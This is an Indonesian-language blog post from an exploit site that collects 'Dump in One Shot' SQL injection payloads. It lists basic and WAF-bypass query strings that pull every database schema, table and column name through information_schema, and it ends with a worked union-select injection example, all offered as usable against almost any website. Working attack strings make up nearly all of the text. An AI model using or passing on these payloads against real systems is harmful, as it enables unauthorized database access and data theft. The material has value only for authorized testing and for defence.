• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Payload Dump in One Shot SQL Injection

May 4, 2018 by Jack Wilder Leave a Comment

Payload Dump in One Shot SQL Injection. Payload ini bukan buatan saya. Payload ini saya kumpulkan dari beebrapa expert SQL injection seperti mas M@dbl00d maupun Zen dari Security Idiots. Oke, sebelumnya buat yang belum tau apa itu DIOS atau Dump in One Shot, DIOS adalah query sql injection yang digunakan untuk mengekstrak seluruh tabel dan kolom dalam database target. Jadi satu payload yang bisadigunakan di (hampir) semua website.

Berikut contohnya:

Basic Payloads

concat(0x3c623e44756d7020696e204f6e652053686f743c2f623e3c62723e,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!=’information_schema’ and(@a)in (@a:=concat(@a,table_schema,’ > ‘,table_name,’ > ‘,column_name,'<br>’))))a)

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns)
where (table_schema!=’information_schema’) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,’ :: ‘,@tbl:=table_name,’
‘,column_name), (column_name))))))a)

(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,0x3c62723e,schema_name))))x)

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Bypass WAF Payloads

concat (0x3c623e44756d7020696e204f6e652053686f743c2f623e,0x3c62723e,version(),0x3c62723e,user(),0x3c62723e,database(),@c:=0x00,if((select count(*) from /*!50000information_schema*/.columns /*!50000where*/ table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat (@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)

(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345’%69nformation_schema’*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)

(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Cara Menggunakan Payload

Cukup masukkan query nya kedalam salahsatu magic number. Contoh eksekusi

1337′ union select 1,2,concat (0x3c623e44756d7020696e204f6e652053686f743c2f623e,0x3c62723e,version(),0x3c62723e,user(),0x3c62723e,database(),@c:=0x00,if((select count(*) from /*!50000information_schema*/.columns /*!50000where*/ table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat (@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)
,4,5#

Oke mungkin sekian tutorial kali ini, semoga bermanfaat.

Referensi

  • http://www.securityidiots.com/Web-Pentest/SQL-Injection/DIOS-the-SQL-Injectors-Weapon-Upgraded.html
Shares

Filed Under: SQL Injection

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Mass Deface setelah Rooting Server

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

WordPress Army Knife CSRF File Upload Vulnerability

GitHub Custom Domain or Subdomain Takeover

Cara Mendapatkan RDP Gratis Dengan Shell Windows

MIME Type Sniffing pada Form Upload Gambar

Readme.io Custom Domain or Subdomain Takeover

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Surge.sh Custom Domain or Subdomain Takeover

LinuxSec / 64 queries in 0.07 seconds